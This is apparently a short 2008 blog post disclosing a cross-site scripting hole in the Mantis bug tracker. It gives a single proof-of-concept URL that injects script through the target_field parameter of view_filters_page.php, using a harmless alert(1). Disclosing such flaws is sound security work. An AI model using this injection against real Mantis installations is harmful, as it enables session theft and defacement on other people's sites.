Mantis Bug Tracker XSS

March 1st, 2008  | Tags: , ,

‘Mantis is a free popular web-based bugtracking system’ – http://www.mantisbt.org/

I didn’t audit this, I don’t want to audit this, I just found it while using Mantis. There may be more, but this is what I got:

/view_filters_page.php?for_screen=1&target_field=show_category[]%22;alert(1);x=%22
Share and Enjoy:
  • Facebook
  • HackerNews
  • Reddit
  • Digg
  • del.icio.us
  • Twitter
  • StumbleUpon
  • LinkedIn
  • Google Bookmarks
  • Slashdot
  • Technorati
  • email
  • DZone
  • Suggest to Techmeme via Twitter
  • RSS
  • PDF
  • Print
Leave a comment | Trackback
« »
No comments yet.
TOP